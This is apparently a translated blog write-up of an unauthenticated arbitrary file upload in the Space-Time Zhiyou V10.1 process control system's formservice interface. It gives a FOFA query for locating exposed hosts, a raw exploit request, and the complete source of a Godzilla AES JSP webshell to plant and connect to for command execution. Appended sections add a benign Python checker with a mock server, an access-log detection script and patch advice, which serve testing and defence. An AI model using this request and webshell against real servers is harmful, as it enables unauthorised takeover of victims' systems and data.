Vulnerability in uploading files in the process-based management and control system of Space-time Zhiyou Enterprise

Disclaimer: do not use the techniques in this article for illegal testing. Any direct or indirect consequences or losses arising from the dissemination or use of the information or tools provided here are borne solely by the user and have nothing to do with the author. This article is for educational purposes only.

1. Product Introduction

The Space-Time Zhiyou Enterprise Process Control System is a feature-rich, flexible and customizable enterprise management tool. With it, enterprises can automate processes, improve collaboration, gain insight from their data and optimize decision-making, thereby raising efficiency, management quality and competitiveness.

2. Vulnerability overview

The formservice interface of the Space-Time Zhiyou Enterprise Process Control System has an arbitrary file upload vulnerability. Its attachment.write service writes the raw request body to a file whose name is taken from the filename query parameter, requires no authentication, and accepts server-side script names such as a.jsp. An unauthenticated attacker can therefore upload a JSP backdoor through this interface and take control of the server.

3. Scope of influence

Space-Time Zhiyou V10.1

4. Reproduction environment

FOFA query (the app name is the product's Chinese name, translated here): app="Space-Time Zhiyou V10.1"

[FOFA screenshot omitted]

5. Vulnerability recurrence

Burp POC (raw request; replace your-ip with the target host):

POST /formservice?service=attachment.write&isattach=false&filename=a.jsp HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

<content: the request body is written to the file as-is, no multipart encoding needed>

[Burp screenshot omitted]

Verify the write: the response echoes the name of the file that was saved, and the uploaded file is then reachable at http://ip/form/temp/<filename>, where the server returns exactly the content you sent in the request body.

[screenshot omitted]
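The two steps above (upload, then fetch from /form/temp/) as a non-destructive checker. This is an added example, not code from the original post or from the vendor: it writes a harmless .txt marker instead of a .jsp and confirms that the marker is served back. A constructed mock server imitating the behaviour the post reports lets the checker run offline; the assumptions that the response body echoes the saved filename and that the file is served from /form/temp/<name> come from the post's screenshots and are not otherwise confirmed.

```python
# Added example (not code from the original post): a non-destructive checker for
# the formservice attachment.write upload described above, plus a constructed mock
# server that imitates the behaviour the post reports, so the checker can be run
# offline. Assumptions not confirmed by the post: the endpoint echoes the saved
# filename in its response body, and the file is served from /form/temp/<name>.
import threading
import uuid
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlsplit

UPLOAD_PATH = "/formservice?service=attachment.write&isattach=false&filename={name}"
TEMP_DIR = "/form/temp/"


def check_upload(base_url, filename=None, timeout=10):
    """Write a harmless unique marker under a .txt name and confirm the server
    serves it back from /form/temp/. Returns (confirmed, detail)."""
    name = filename or f"poc_{uuid.uuid4().hex[:8]}.txt"
    marker = f"marker-{uuid.uuid4().hex}".encode()
    base = base_url.rstrip("/")
    req = urllib.request.Request(
        base + UPLOAD_PATH.format(name=name),
        data=marker,  # the raw body is what gets written to disk
        method="POST",
        headers={"User-Agent": "Mozilla/5.0"},
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read().decode(errors="replace")
    except urllib.error.URLError as exc:
        return False, f"upload request failed: {exc}"
    if name not in body:
        return False, "response does not echo the filename"
    try:
        with urllib.request.urlopen(base + TEMP_DIR + name, timeout=timeout) as resp:
            fetched = resp.read()
    except urllib.error.URLError as exc:
        return False, f"file not reachable under {TEMP_DIR}: {exc}"
    if fetched != marker:
        return False, "served content does not match the uploaded marker"
    return True, f"unauthenticated write confirmed: {TEMP_DIR}{name}"


class _MockVulnerableHandler(BaseHTTPRequestHandler):
    """Constructed stand-in for the vulnerable endpoint (not the real product):
    no authentication, no extension check, filename taken straight from the query."""
    store = {}

    def do_POST(self):
        parts = urlsplit(self.path)
        qs = parse_qs(parts.query)
        if parts.path == "/formservice" and qs.get("service") == ["attachment.write"]:
            name = qs.get("filename", [""])[0]
            length = int(self.headers.get("Content-Length", 0))
            self.store[name] = self.rfile.read(length)
            self._send(200, name.encode())  # echo the written filename
        else:
            self._send(404, b"not found")

    def do_GET(self):
        name = self.path[len(TEMP_DIR):] if self.path.startswith(TEMP_DIR) else None
        if name in self.store:
            self._send(200, self.store[name])
        else:
            self._send(404, b"not found")

    def _send(self, code, body):
        self.send_response(code)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the mock quiet
        pass


def run_against_mock():
    """Start the mock on a random loopback port, run the checker against it,
    and return the checker's result."""
    srv = HTTPServer(("127.0.0.1", 0), _MockVulnerableHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:
        return check_upload(f"http://127.0.0.1:{srv.server_port}")
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    import sys
    confirmed, detail = check_upload(sys.argv[1]) if len(sys.argv) > 1 else run_against_mock()
    print(("VULNERABLE: " if confirmed else "not confirmed: ") + detail)
```

Run it with a base URL (http://target:port) to check a host you are authorized to test, or with no argument to exercise the mock. A confirmed result means an unauthenticated client can write a file of its chosen name under the web root and read it back; since the filename is attacker-controlled, that is the whole vulnerability without leaving an executable file on the target. If the target only rejects script extensions, the .txt check would still pass, so treat a positive as "unauthenticated write" and confirm the extension handling separately.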
Upload a Godzilla webshell: send the same request again with the body replaced by the stock Godzilla JSP AES template (password pass, key as in the template).

POST /formservice?service=attachment.write&isattach=false&filename=a.jsp HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
 
<%!
String xc = "3c6e0b8a9c15224a";   // AES key
String pass = "pass";              // request parameter that carries the payload
String md5 = md5(pass + xc);       // its two halves frame every response

class X extends ClassLoader {
    public X(ClassLoader z) { super(z); }
    public Class Q(byte[] cb) { return super.defineClass(cb, 0, cb.length); }
}

// AES encrypt (m == true) or decrypt (m == false) with the fixed key
public byte[] x(byte[] s, boolean m) {
    try {
        javax.crypto.Cipher c = javax.crypto.Cipher.getInstance("AES");
        c.init(m ? 1 : 2, new javax.crypto.spec.SecretKeySpec(xc.getBytes(), "AES"));
        return c.doFinal(s);
    } catch (Exception e) { return null; }
}

public static String md5(String s) {
    String ret = null;
    try {
        java.security.MessageDigest m = java.security.MessageDigest.getInstance("MD5");
        m.update(s.getBytes(), 0, s.length());
        ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();
    } catch (Exception e) {}
    return ret;
}

// Base64 via reflection so the shell compiles on both old and new JDKs
public static String base64Encode(byte[] bs) throws Exception {
    Class base64; String value = null;
    try {
        base64 = Class.forName("java.util.Base64");
        Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);
        value = (String) Encoder.getClass().getMethod("encodeToString", new Class[]{ byte[].class }).invoke(Encoder, new Object[]{ bs });
    } catch (Exception e) {
        try {
            base64 = Class.forName("sun.misc.BASE64Encoder");
            Object Encoder = base64.newInstance();
            value = (String) Encoder.getClass().getMethod("encode", new Class[]{ byte[].class }).invoke(Encoder, new Object[]{ bs });
        } catch (Exception e2) {}
    }
    return value;
}

public static byte[] base64Decode(String bs) throws Exception {
    Class base64; byte[] value = null;
    try {
        base64 = Class.forName("java.util.Base64");
        Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);
        value = (byte[]) decoder.getClass().getMethod("decode", new Class[]{ String.class }).invoke(decoder, new Object[]{ bs });
    } catch (Exception e) {
        try {
            base64 = Class.forName("sun.misc.BASE64Decoder");
            Object decoder = base64.newInstance();
            value = (byte[]) decoder.getClass().getMethod("decodeBuffer", new Class[]{ String.class }).invoke(decoder, new Object[]{ bs });
        } catch (Exception e2) {}
    }
    return value;
}
%><%
try {
    byte[] data = base64Decode(request.getParameter(pass));
    data = x(data, false);                                  // decrypt the client's payload
    if (session.getAttribute("payload") == null) {
        // first request: define the client's class and keep it in the session
        session.setAttribute("payload", new X(this.getClass().getClassLoader()).Q(data));
    } else {
        // later requests: run it, then return its output encrypted and framed by the md5 halves
        request.setAttribute("parameters", data);
        java.io.ByteArrayOutputStream arrOut = new java.io.ByteArrayOutputStream();
        Object f = ((Class) session.getAttribute("payload")).newInstance();
        f.equals(arrOut);
        f.equals(pageContext);
        response.getWriter().write(md5.substring(0, 16));
        f.toString();
        response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));
        response.getWriter().write(md5.substring(16));
    }
} catch (Exception e) {}
%>

[Burp screenshot omitted]

Xiaolong POC detection script:

[screenshot omitted]

Test the connection from the Godzilla client:

[screenshot omitted]

The client reports a successful connection.

[screenshot omitted]

Viewing the sent data in Burp shows the encrypted Godzilla traffic to the uploaded shell:

[screenshot omitted]

The command executes successfully.

[screenshot omitted]

6. Repair suggestion

Require strong authentication on the formservice interface (at least for the attachment.write service) and reject unauthenticated calls. Beyond that, validate the filename parameter against an allowlist of extensions that excludes .jsp and other server-side script types, reject path separators, and store uploads outside the web root or configure the container so that nothing under /form/temp/ is executed. Check with the vendor for a patched version.
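Defenders can also hunt for past attempts in web-server access logs. The following is an added example, not part of the original post: it flags POST requests to /formservice with service=attachment.write (severity raised when the filename carries a script extension or path traversal) and the follow-up GET of a script under /form/temp/, which is the shell being contacted. The log lines in SAMPLE_LOG are constructed for illustration; the request shapes are the ones shown in the POC above.

```python
# Added example (not from the original post): hunt for exploitation attempts in
# web-server access logs. The request shapes are the ones shown in the post
# (POST /formservice?service=attachment.write&...&filename=x.jsp, then a GET of
# /form/temp/x.jsp); the log lines in SAMPLE_LOG are constructed, not real.
import os
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined/common log format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Extensions a servlet container will execute rather than serve as data.
SCRIPT_EXT = {".jsp", ".jspx", ".jspf", ".jsw", ".jsv"}
TEMP_DIR = "/form/temp/"


def classify(line):
    """Return a finding dict for one log line, or None if it is not of interest."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    status = int(m["status"])
    base = {"ip": m["ip"], "time": m["time"], "status": status,
            "succeeded": 200 <= status < 300}

    if m["method"] == "POST" and parts.path == "/formservice":
        qs = parse_qs(parts.query)  # percent-decodes once
        if qs.get("service") != ["attachment.write"]:
            return None
        filename = unquote(qs.get("filename", [""])[0])  # second decode catches double-encoding
        ext = os.path.splitext(filename)[1].lower()
        return {**base,
                "rule": "script-upload" if ext in SCRIPT_EXT else "attachment-upload",
                "filename": filename,
                "traversal": ".." in filename or "/" in filename or "\\" in filename}

    if m["method"] == "GET" and parts.path.startswith(TEMP_DIR):
        if os.path.splitext(parts.path)[1].lower() in SCRIPT_EXT:
            return {**base, "rule": "temp-script-fetch",
                    "filename": parts.path[len(TEMP_DIR):], "traversal": False}
    return None


def hunt(lines):
    """Run classify over every line and keep the hits, in log order."""
    return [f for f in map(classify, lines) if f]


# Constructed sample log (not from any real system).
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Aug/2023:10:12:01 +0800] "POST /formservice?service=attachment.write&isattach=false&filename=a.jsp HTTP/1.1" 200 5 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [25/Aug/2023:10:12:03 +0800] "GET /form/temp/a.jsp?pass=AAAA HTTP/1.1" 200 28 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [25/Aug/2023:10:15:44 +0800] "POST /formservice?service=attachment.write&isattach=true&filename=report.pdf HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [25/Aug/2023:10:20:10 +0800] "POST /formservice?service=attachment.write&isattach=false&filename=..%2F..%2Fx.jsp HTTP/1.1" 403 0 "-" "curl/8.1"',
    '10.0.0.5 - - [25/Aug/2023:10:21:00 +0800] "GET /login.jsp HTTP/1.1" 200 1034 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f"{f['rule']:<18} {f['ip']:<14} {f['status']} {f['filename']}")
```

A script-upload with a 2xx status followed within seconds by a temp-script-fetch from the same address is the strong signal; an attachment-upload alone may be legitimate use of the interface, and a 4xx script-upload shows an attempt that was blocked.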

Source: blog.csdn.net/holyxp/article/details/132452361